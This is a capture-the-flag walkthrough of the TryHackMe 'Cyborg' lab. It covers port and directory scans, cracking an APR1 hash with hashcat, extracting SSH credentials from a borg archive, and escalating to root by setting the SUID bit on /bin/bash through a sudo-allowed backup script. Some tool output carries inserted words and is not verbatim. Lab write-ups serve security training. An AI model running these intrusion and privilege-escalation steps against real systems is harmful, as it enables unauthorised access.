/////JOINED Cyborg CTF/////////
———————–SCANNING Cyborg —————————-
JUST STARTED AN NMAP SCAN –
Result –:
nmap -sC -sV 10.10.76.128
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-27 15:48 IST
Nmap scan report for 10.10.76.128
The host is up (0.23s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA)
| 256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA)
|_ 256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
///————///
NMAP SCAN IS JUST COMPLETED AND WE FIND THE 2 OPEN PORTS
1.SSH
2.HTTP
STARTED A GO BUSTER DIRECTORY SCAN –
Result –:
go buster dir -u http://10.10.76.128 -w /usr/share/wordlists/dirb/common.txt -z
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.76.128
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/07/27 15:49:00 Starting go buster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/admin (Status: 301) [Size: 312] [–> http://10.10.76.128/admin/]
/etc (Status: 301) [Size: 310] [–> http://10.10.76.128/etc/]
/index.html (Status: 200) [Size: 11321]
/server-status (Status: 403) [Size: 277]
===============================================================
2021/07/27 15:51:32 Finished Cyborg scan of Tryhackme.
===============================================================
////———-////
Gobuster scan is just completed and we found a useful directory — ADMIN
IN ADMIN WE FOUND SOME TAR FILES AND A ADMINS CHAT AND SOME PASSWORDS WHICH ARE IN HASH–
——————————CRACKING THE HASHES—————————–
WE HAVE TO FIRST CHECK THAT WHICH HASH IS THAT THAT’S WHY I AM USING THE HASH-IDENTIFIER TOOL IN THE KALI LINUX PRE-INSTALLED!!
HASH# $apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.
The result –: Possible Hashes:
[+] MD5(APR)
THE HASH IS MD5 IT’S TIME TO CRACK THIS HASH WITH HASHCAT —
hashcat –force -m 1600 -a 0 has /usr/share/wordlists/rockyou.txt
Result –: $apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.: squidward
AS YOU CAN SEE PASSWD IS SQUIDWARD !! THIS PASSWORD IS POSSIBLY FOR THE BORG WHICH IS USED FOR ENCRYPT AND FOR COMPRESSING!!
//////////————-//////////
LET’S START DOING THAT !!
borg extract /path/to/archive::music_archive
The result–: Wow I’m awful at remembering Passwords so I’ve taken my Friend’s advice and noting them down!
Alex:[email protected]
SO WE HAVE THE CREDENTIALS OF THE SSH LOG IN!! Tryhackme.
/———————————–GAINING THE SHELL INTO THE MACHINE———————————————————\
AS WE HAVE THE PASSWORD AND THE USER OF THE ALEX USER WE EASILY GOT THE USER.TXT
CAT USER.TXT >>> — flag{1_hop3_y0u_ke3p_th3_arch1v3s_saf3}
NOW IT’S TIME TO ESCALATE THE PRIVILEGES OF THE ROOT!!!
————————–PRIVILEGE ESCALATION Cyborg ————————-
SO BY TYPING THE SUDO -L —
Matching Defaults entries for alex on ubuntu: Cyborg Tryhackme.
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User alex may run the following commands on ubuntu:
(ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh
SO WE CAN THE /ETC/MP3BACKUPS/BACKUP.SH WITH ROOT SO WE HAVE TO JUST MODIFY THAT AND THEN WE CAN HAVE THE ROOT SHELL!!!
SO NOW LET’S START BY TYPING THIS COMMAND —
sudo /etc/mp3backups/backup.sh -c whoami
Result –: root Tryhackme.
BY TYPING THIS, WE CAN HAVE THE ROOT ACCESS SO LET’S DO IT WITH BIN/BASH !!
sudo /etc/mp3backups/backup.sh -c “chmod +s /bin/bash”
BASH -P
whoami
root
bash-4.3# cat /root/root.txt = flag[——–flag——]
SO IT’S OVER !!!!!!
/////////////////COMPLETED THE CYBORG /////////////////////